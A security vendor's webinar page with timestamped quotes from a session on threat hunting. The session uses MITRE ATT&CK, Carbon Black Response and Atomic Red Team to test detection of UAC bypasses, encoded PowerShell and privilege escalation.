Events & WebinarsThreat hunting
Joe Moles Adam Mathis Jimmy Astle

Testing visibility to develop an innovative threat hunting program


Gain the visibility you need to hunt for adversary techniques.

Increasing the quality and quantity of data analysis requires a robust set of tools, techniques, and practices. Watch this webcast to learn how to use Carbon Black Response to hunt for frequently used MITRE ATT&CK techniques, then run Atomic Red Team tests to measure and improve visibility.

Ideal for:

  • Security architects, security engineers, SOC & CIRT leaders
  • Hunting Maturity Model (HMM): Level 2-3
  • Technical depth: intermediate to advanced

01:43 Presenter Introduction

02:25 Tools We’ll Be Using

  1. MITRE’s ATT&CK Framework
  2. Cb Response
  3. Red Canary’s Atomic Red Team

03:08 Webinar Agenda

04:02 Demonstration

06:05 “It takes all the MITRE techniques and puts them into a nice visual representation.” -Jimmy

08:40 The UAC Bypass Techniques We Will Review

09:02 “These binaries have a special attribute to them so that when they execute, they’re actually allowed to auto-elevate their permissions.” -Jimmy 

11:43 EVENTVWR.exe

11:48 “Without admin rights, you can modify this key to then get to this token.” -Jimmy

17:25 SDLCLT.exe

17:54 “The researcher that discovered this had opened this binary up in IDA and noticed that it took a kick off elevation command line parameter and that is what actually does that auto elevation and allows the UAC bypass.” -Jimmy

19:00 Using Tools Effectively

19:14 “I can’t stress enough how important it is to use tools like PowerShell Empire.” -Jimmy

21:26 “Once you have completed your hunt, there should be an output. You should have something that says I hunted for this thing, and now I am going to automate it going forward.” -Adam

23:45 Testing Atomically

25:03 “Testing is critical in pretty much every aspect of your security program. If you don’t test it, you don’t know it works.” -Adam

25:18 “The idea of the Atomic Red Team is to enable rapid, iterative testing enabling you to grow your security program and build efficacy.” -Adam

26:36 “One of the ways we can use this is that we have this index we create dynamically when new tests are contributed.” -Adam

27:06 The Testing Cycle

28:50 “At the end of the day, this is not a ‘one and done.’ This is a ‘continue to test so I can iterate through this.’ I continue building out my detection and build out the rest of my security program.” -Adam

31:48 PowerShell

32:42 “Looking for encoded commands is a great way to find boatloads of evil.” -Adam 

33:10 Encoded PowerShell Video

34:00 “Don’t test on things you aren’t authorized to test on.” -Adam

35:15 Atomic PowerShell

35:22 “Going through the Atomic Red Team, there’s a lot of PowerShell tests.” -Adam 

37:42 Privilege Escalation

39:02 Scheduled Tasks

40:05 “You don’t have to catch everything the actor does, you just have to catch them once.” -Adam

40:30 Service Creation

40:33 “Modifying existing services is another thing that PowerUp does to escalate their privileges.” -Adam

43:35 Always Be Testing

43:45 “Follow your ABTs: Always Be Testing.” -Adam

43:49 “It’s one of those things that you will always be testing and always be tuning because the security landscape is always changing.” -Adam

44:28 Questions and Answers

44:43 Question 1: How do I pick where to start?

45:17 “I think you start where you have the best tooling and visibility available to you.” -Adam

47:46 Question 2: What other key indicators are you focusing on if you are hunting privilege escalation?

48:39 “Scoping it around user behavior is also a really interesting one that leads to a lot of really good threat hunting outcomes.” -Adam

51:05 Question 3: Have you actually seen a UAC bypass that works when credentials aren’t required to be entered? And what kind of indicators would you be looking for around a lssas and limerick type attack?

51:59 “We see samples all the time that reuse these publicly available UAC bypasses.” -Jimmy

52:10 “At the end of the day, you should be looking at untrusted processes and things you’ve never seen before touching lsass.” -Jimmy

54:19 Question 4: What kind of metrics would you report up to management to justify for this type of program or to advocate for building more hunting into your processes?

55:02 “Dedicating some percentage of your analyst’s time to searching for well-known documented behaviors should be a gimme.” -Adam

57:36 Question 5: Where and when do you draw the line between threat hunting and incident response procedures when you’re performing atomic testing and hunting engagement?

58:40 “It’s pretty black and white in the sense of that’s normal, that’s not normal. I think overlaying that with the behaviors that you would’ve expected to see is going to lead you down that path of ‘we should probably call people or get the lawyers involved’ or whatever your incident response process is.” -Jimmy

59:58 Question 6: Have we seen technology vendors building signatures to match atomic tests?

01:00:34 “I have actually seen live threat actors pulling artifacts from GitHub Repos.” -Jimmy

How to use MITRE ATT&CK to mature your threat hunting program
Becoming a leader: an inside look at an advanced threat hunting program
Q & A: How to Use the MITRE ATT&CK™ Framework to Mature Your Threat Hunting Program
Q&A: Visibility, Testing Critically Important for Hunting